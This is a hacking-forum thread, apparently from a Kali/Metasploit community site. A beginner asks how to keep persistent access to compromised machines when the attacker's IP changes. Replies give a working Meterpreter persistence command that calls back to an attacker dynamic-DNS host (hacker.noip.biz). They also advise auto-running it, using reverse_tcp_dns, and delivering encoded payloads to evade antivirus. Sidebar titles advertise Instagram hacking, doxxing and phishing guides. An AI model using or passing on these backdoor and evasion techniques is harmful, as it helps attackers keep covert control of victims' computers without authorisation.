Hello guys,
Rookie here, so i was watching OTW series, and i have a couple of questions,
lets imagine that i want to compromise some machines, and i want to have a persistent acess to it, in a WAN and LAN environment, since when you make a payload the LHOST cant be changed after being executed in the victim machine so how can I resolve this problem, and other thing in a WAN environment i dont have a fixed public IP so how can i workarround this, since my ip changes.
Ty for your time
Forum Thread:
When My Kali Linux Finishes Installing (It Is Ready to Boot), and When I Try to Boot It All I Get Is a Black Screen.
8
Replies
Forum Thread:
HACK ANDROID with KALI USING PORT FORWARDING(portmap.io)
12
Replies
Forum Thread:
Hydra Syntax Issue Stops After 16 Attempts
2
Replies
Forum Thread:
Hack Instagram Account Using BruteForce
208
Replies
Forum Thread:
Metasploit reverse_tcp Handler Problem
47
Replies
Forum Thread:
How to Train to Be an IT Security Professional (Ethical Hacker)
22
Replies
Metasploit Error:
Handler Failed to Bind
41
Replies
Forum Thread:
How to Hack Android Phone Using Same Wifi
21
Replies
How to:
HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide]
177
Replies
How to:
Crack Instagram Passwords Using Instainsane
36
Replies
Forum Thread:
How to Hack an Android Device Remotely, to Gain Acces to Gmail, Facebook, Twitter and More
5
Replies
Forum Thread:
How Many Hackers Have Played Watch_Dogs Game Before?
13
Replies
Forum Thread:
How to Hack an Android Device with Only a Ip Adress
55
Replies
How to:
Sign the APK File with Embedded Payload (The Ultimate Guide)
10
Replies
Forum Thread:
How to Run and Install Kali Linux on a Chromebook
18
Replies
Forum Thread:
How to Find Admin Panel Page of a Website?
13
Replies
Forum Thread:
can i run kali lenux in windows 10 without reboting my computer
4
Replies
Forum Thread:
How to Hack School Website
11
Replies
Forum Thread:
Make a Phishing Page for Harvesting Credentials Yourself
8
Replies
Forum Thread:
Creating an Completely Undetectable Executable in Under 15 Minutes!
38
Replies
How To:
Dox Anyone
BT Recon:
How to Snoop on Bluetooth Devices Using Kali Linux
How To:
Find Vulnerable Webcams Across the Globe Using Shodan
How To:
Gain SSH Access to Servers by Brute-Forcing Credentials
How to Hack Bluetooth, Part 1:
Terms, Technologies, & Security
How To:
Crack SSH Private Key Passwords with John the Ripper
How To:
Enumerate SMB with Enum4linux & Smbclient
Hack Like a Pro:
How to Find Directories in Websites Using DirBuster
How To:
Seize Control of a Router with RouterSploit
How To:
Target Bluetooth Devices with Bettercap
How To:
Scan, Fake & Attack Wi-Fi Networks with the ESP8266-Based WiFi Deauther
How To:
Advanced Techniques to Bypass & Defeat XSS Filters, Part 1
How to Hack Wi-Fi:
Cracking WPA2-PSK Passwords with Cowpatty
How To:
Catch an Internet Catfish with Grabify Tracking Links
How To:
Exploit EternalBlue on Windows Server with Metasploit
How To:
Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
How To:
Hack Apache Tomcat via Malicious WAR File Upload
How To:
Scan for Vulnerabilities on Any Website Using Nikto
How To:
Brute-Force FTP Credentials & Get Server Access
How To:
Spy on Traffic from a Smartphone with Wireshark
5 Responses
use noip and after compromising the system execute persistence.
example of the command i use after i get a meterpreter session in WAN environment:
run persistence –A –L C:\\ -P windows/meterpreter/reverse_https -X 30 –p 443 –r hacker.noip.biz
ty man, and btw in lan environment can i dynamically change the private IP? i guess not but maybe you guys know something that i dont
You can just set that as an autoscript so that when you get the meterpreter shell it automatically executes (in case you arent near your computer when the shell opens)
If you want the meterpreter to resolve your no-ip adress you need to use meterpreter reverse_tcp_dns. And for the persistence you better use exploit/windows/local/persistence module since the integrated persistence in meterpreter is definitely going to be detected if the victim has any AV. use EXE::Custom advanced option to deliver an encoded or special payload that is better in evading the AV. -Ne-py
Seems good, ty for your time
Share Your Thoughts